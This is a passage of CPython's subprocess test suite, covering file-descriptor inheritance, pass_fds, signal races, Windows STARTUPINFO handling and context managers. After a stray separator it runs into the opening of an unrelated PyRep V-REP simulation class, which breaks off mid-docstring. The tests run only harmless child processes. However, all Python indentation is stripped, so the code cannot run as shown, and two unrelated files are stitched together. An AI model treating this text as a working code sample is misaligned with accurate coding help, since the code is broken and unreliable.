"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
False, [], 0, -1,
func)
# Attempt to prevent
# "TypeError: fork_exec() takes exactly N arguments (M given)"
# from passing the test. More refactoring to have us start
# with a valid *args list, confirm a good call with that works
# before mutating it in various ways to ensure that bad calls
# with individual arg type errors raise a typeerror would be
# ideal. Saving that for a future PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
None, None, None, -1,
None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
support.wait_process(proc.pid, exitcode=0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
support.wait_process(proc.pid, exitcode=0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
# Don't check the returncode value: the test reads the exit status,
# so Popen failed to read it and uses a default returncode instead.
self.assertIsNotNone(proc.returncode)
def test_send_signal_race2(self):
# bpo-40550: the process might exist between the returncode check and
# the kill operation
p = subprocess.Popen([sys.executable, '-c', 'exit(1)'])
# wait for process to exit
while not p.returncode:
p.poll()
with mock.patch.object(p, 'poll', new=lambda: None):
p.returncode = None
p.send_signal(signal.SIGTERM)
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
pyrep.py | from pyrep.backend import vrep, utils
from pyrep.objects.object import Object
from pyrep.objects.shape import Shape
from pyrep.textures.texture import Texture
from pyrep.errors import PyRepError
import os
import sys
import time
import threading
from threading import Lock
from typing import Tuple, List
class PyRep(object):
"""Used for interfacing with the V-REP simulation.
Can be used for starting, stopping, and stepping the simulation. As well
as getting, and creating scene objects and robots.
"""
def __init__(self):
self.running = False
self._process = None
self._robot_to_count = {}
self.connected = False
self._ui_thread = None
self._responsive_ui_thread = None
self._step_lock = Lock()
self._init_thread_id = None
self._shutting_down = False
self._handles_to_objects = {}
if 'VREP_ROOT' not in os.environ:
raise PyRepError(
'VREP_ROOT not defined. See installation instructions.')
self._vrep_root = os.environ['VREP_ROOT']
if not os.path.exists(self._vrep_root):
raise PyRepError(
'VREP_ROOT was not a correct path. '
'See installation instructions')
def _run_ui_thread(self, scene_file: str, headless: bool) -> None:
# Need this otherwise extensions will not be loaded
os.chdir(self._vrep_root)
options = vrep.sim_gui_headless if headless else vrep.sim_gui_all
vrep.simExtLaunchUIThread(options=options, scene=scene_file,
pyrep_root=self._vrep_root)
def _run_responsive_ui_thread(self) -> None:
while True:
if not self.running:
with self._step_lock:
if self._shutting_down or vrep.simExtGetExitRequest():
break
vrep.simExtStep(False)
time.sleep(0.01)
# If the exit request was from the UI, then call shutdown, otherwise
# shutdown caused this thread to terminate.
if not self._shutting_down:
self.shutdown()
def launch(self, scene_file="", headless=False, responsive_ui=False,
blocking=False) -> None:
"""Launches V-REP.
Launches the UI thread, waits until the UI thread has finished, this
results in the current thread becoming the simulation thread.
:param scene_file: The scene file to load. Empty string for empty scene.
:param headless: Run V-REP in simulation mode.
:param responsive_ui: If True, then a separate thread will be created to
